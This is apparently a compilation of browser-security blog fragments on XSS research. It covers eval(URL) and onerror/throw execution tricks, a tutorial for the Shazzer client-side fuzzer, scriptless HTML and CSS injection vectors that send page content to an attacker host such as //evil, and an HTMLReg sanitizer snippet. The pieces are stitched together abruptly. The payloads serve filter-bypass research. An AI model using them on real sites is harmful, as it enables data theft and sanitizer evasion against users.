(label) (comment)


That’s weird and cool but how do we execute JavaScript from the url? Something like:

(label) (comment) (newLine) (functionCall)


Trouble is the new line isn’t allowed inside the browser url bar or is it? ES5 introduced in the standard that line separators and paragraph separators would act as traditional new lines in JavaScript and separate new statements. Thankfully our friend IE allows us to do this directly in the url. Using these characters allows you to create an eval’able url.

test line sep
test para sep

So now we don’t need to do eval(location.hash.slice(1)) we can simply do eval(location) I found this while discussing with Mario and Yosuke Hasegawa on what the shortest HTML based XSS injection was. Using this technique it’s probably 21 (without using netscape 4).


<svg onload=eval(URL)


You of course must pass your JavaScript as a non-existent query param such as:

&
alert(1)


Update…

As Stefano Di Paola points out, using hash will allow you to use this technique on Chrome and Opera.

So in JavaScript we have a onerror handler which is also on the window object, this means if we assign a function to onerror we can call it by generating a JavaScript error! How do we generate a JavaScript error? Throw is a nice way, this means throw can pass an argument to a function you can create some pretty awesome crazy looking JavaScript.


onerror=alert;throw 1;


This works on every browser apart from Firefox *, Safari and IE will just call the function with the argument but Chrome and Opera add uncaught to the argument. This is no big deal though since we can just modify it slightly and use a different object as an argument such as a string.


onerror=eval;throw'=alert\x281\x29';


Thought I’d post this before this technique gets lost forever and I forget about it pretty awesome XSS eh?

* Does actually work in Firefox. My site was disabling the error handling.

So what does that actually mean when it comes to vector creation? Here is an example enumeration vector:

<*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*>


*datahtmlelements* refers to a dataset and in this instance we are talking about html elements, so the placeholder will be replaced by “iframe”, “b”, “html” and so on, the same this will happen to *datahtmlattributes* but this time using each attribute. Shazzer checks your vector for how many instances of placeholders you have and then automatically creates a loop within all the data so it enumerates each dataset within a nested loop of up to 5 separate datasets. The amount of data is split between a maximum of 10,000 iterations so your data will all be enumerated no matter how big the total iterations are it will just take a long time for a lot of nested datasets

You can see in the vector that the placeholders are used more than once this enables you to log any interesting results, so here we use the customLog function in Shazzer to send the html element and attribute that executes. Other logging functions are available and are listed in the preparation code when you create a vector.

Steps to create an enumeration vector

1. Check datasets for which data you would like to enumerate. You can create your own dataset if the one you require doesn’t exist.
2. Click create and select “Data enumeration” from the vector type drop down.
3. Give it a nice descriptive name and some keywords to find the vector.
4. You don’t actually need to modify the preparation code unless you need to log something that doesn’t execute like CSS values for instance.
5. Construct your vector by clicking and data placeholders at the bottom and craft you code as if you’re in a loop of all the data structures you use.
6. Once your vector is complete you can now fuzz the vector by choosing it from the “Fuzz vectors” list. Once you’ve found your vector you can select a doctype then click “Fuzz all” to begin fuzzing.

In future you will be able to share these enumeration vectors between your twitter followers in order to distribute the workload between friends to help scan large datasets. Happy fuzzing!

So what the hell is it I hear you ask? Shazzer allows you to perform client based fuzzing and share the results with the world. It scans from 0-100000 characters in a couple of seconds (depending on the vector) and allows you to build different vectors and preparation code. When you think about fuzzing especially about behaviour based fuzzing, there are too many combinations for you to handle on your own. You need to scan every browser version, every os, every charset, every doc mode (for ie) and so on, it’s an impossible amount of data to get through especially when time is limited. At the moment it’s limited to one character mutation and designed for behaviour based fuzzing rather than finding crashes (that will come later).

Shazzer is useful in asking simple questions, for example “What characters are allowed after an attribute name in IE9.0?“. The idea is to construct clever vectors that discover this information and then use your browser to scan the information and ask your friends or colleagues to scan using their browser. The end goal is then to use this information to file bugs, find holes in HTML filters or simply to discover the differences between the various browser versions.

Constructing a vector

To make your own vectors the first thing you need to do is search to see if the vector your are looking for already exists there’s no point reinventing the wheel. Then hit create (after you’ve logged in). The description should be clear and concise and no more than 50 characters, also consider it will be the url of your vector so keep it short and to the point. Keywords allow you to assign search terms for your vector, include any keywords that you think are relevant to your vector such as “anchor, XSS, href” if you are checking the anchor href for different characters. The preparation code allows to modify how the logging works, for JS execution vectors you shouldn’t need to modify this but for HTML/CSS based checks you should modify it to detect if the vector was successful. Consider the following example:

<span id="fuzzelement*num*" style="*chr*color:#000;">>/span>

Here the vector wants to check what characters are allowed before the property “color” in CSS but as this vector doesn’t execute JavaScript you will have to manually check each vector. You do this by modifying the preparation code just below the start of the complete function. Like so:


for(var i=from;i<to;i++) {
try { if(document.getElementById('fuzzelement'+i).style.color.length) {
ids.push(i);
}
}catch(e){}
}


This script takes advantage of the predefined global variables of the fuzzer “from” is where Shazzer is starting from such as “0″ or “10000″ and to is the ending range it’s scanning. Then we check if the color property has been set on the target element and if so add the chr number to the ids. The try catch block stops the fuzz script from breaking if the object doesn’t exist.

For the most part you shouldn’t have to modify the preparation code and mainly you just work on adding new vectors. Vectors work using placeholders *chr* indicates the character and *num* is the character code. If we use the “characters after attribute” as an example from earlier, you simply create some HTML that executes the log and place the *chr* where you want to check. For example:


`"'><img src=1 onerror*chr*=log(*num*)>


At the beginning of the example you will notice that there are quotes and a closing “>” this is to prevent the vectors from overlapping when an attribute is constructed from the fuzz data. The character we are fuzzing appears after onerror and is indicated by *chr*, when the onerror executes the log function is called which is predefined in the preparation code and the argument sent is the character code indicated by *num* this vector will now work on any browser or charset or range etc that any user chooses and allow you to see the result

Fuzzing Samples

Here are a few examples for you to play with:
Characters allowed before a JavaScript function
Characters that close a HTML comment

Have a go with Shazzer yourself and have fun!

0x05

That’s it LOL. Hope you enjoyed it but I doubt you read it.



Button as a scriptless vector

Using button is interesting because of two interesting specification changes in HTML5, one is the fact that the default type for a button is a submit and secondly the formaction attribute allows you to change it’s parent form action. In addition button consumes HTML, allowing you store any html after button until the next or non existent closing button tag. Example vector:


<button name=xss type=submit formaction=//evil>I get consumed!


Option as a scriptless vector

A strange fact is option also consumes HTML, pretty obvious when you think about it but could lead to info disclosure like the button example.


<form action=//evil><select name=xss><option><b>steal me!</b>


@import as a scriptless vector

The CSS specification states that @import should continue parsing a url until it encounters a ending “;”. This means you can use it to consume HTML. A vector like the following can steal data:


<style>@import//hackvertor.co.uk?
<b>steal me!</b>;


Noscript scriptless vector

Another interesting way to defeat XSS filters is to use the noscript tag as demonstrated by my attack against Caja’s HTML filter.


<noscript><form action=http://google.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=pwnd><textarea name=contents></noscript>


It uses the noscript tag to generate a textarea that when enabled (because of no javascript present) consumes the HTML after. This can also be initiated using security=restricted on IE or the new HTML5 iframe sandbox option. Original report.

Using window.name via base target

You can also use the target attribute to assign the contents of the HTML after to the window name and then later retrieve it x-domain after a user clicks an external link.


<base target='
steal me'<b>test</b>


So here we inject a base tag with a target attribute, the target then assigns everything after ‘ to the window.name and then can be retrieved when the user clicks to the external server.

That’s all folks.


javascript&0x00colon;
javascript&colon0x00;


These obviously work inside a anchor href and I think in addition FF requires the HTML5 doctype.

It’s not possible to have a container for every element so I couldn’t figure out a way to stop this overlapping problem, so each time an element is modified you cannot alter it’s dimensions or position. If you want to have a section of your HTML that you want to allow user input to alter dimensions then you can place a container div like so:


<div id="staticHTML" style="border:1px solid #ccc;position:relative;width:300px;height:300px;overflow:hidden;"></div>


This way the modified HTML can’t break out of this element so any modification of staticHTML inside this element should be safe. You’d need to modify the HTMLReg could when you include it on your site in order to modify dimensions nand positioning like so:


if(Element.prototype && !Element.prototype.staticHTML) {
window.Object.defineProperty(Element.prototype, 'staticHTML', {
get: function() {
HTMLReg.setAppID('staticHTML');
HTMLReg.disablePositioning = false;//changed this line!
return HTMLReg.parse(this.innerHTML+'');
},
set: function(val) {
HTMLReg.setAppID('staticHTML');
HTMLReg.disablePositioning = false;//changed this line!
this.innerHTML = HTMLReg.parse(val+'');
}
});
}


To use the property itself you just read and write to the staticHTML property of the DOM object. You can read the staticHTML property without actually altering the DOM object’s innerHTML. Examples below:

document.getElementById('x').staticHTML='<b>test</b>';
alert(document.getElementById('x').staticHTML)

Finally there is the demo and the usual question. Can you break it?
Static HTML demo

Update….

Oh yeah I got it working in IE7 :O how awesome is that? via htc

Here are my non-alphanumeric JavaScript & PHP slides (powerpoint) (pdf)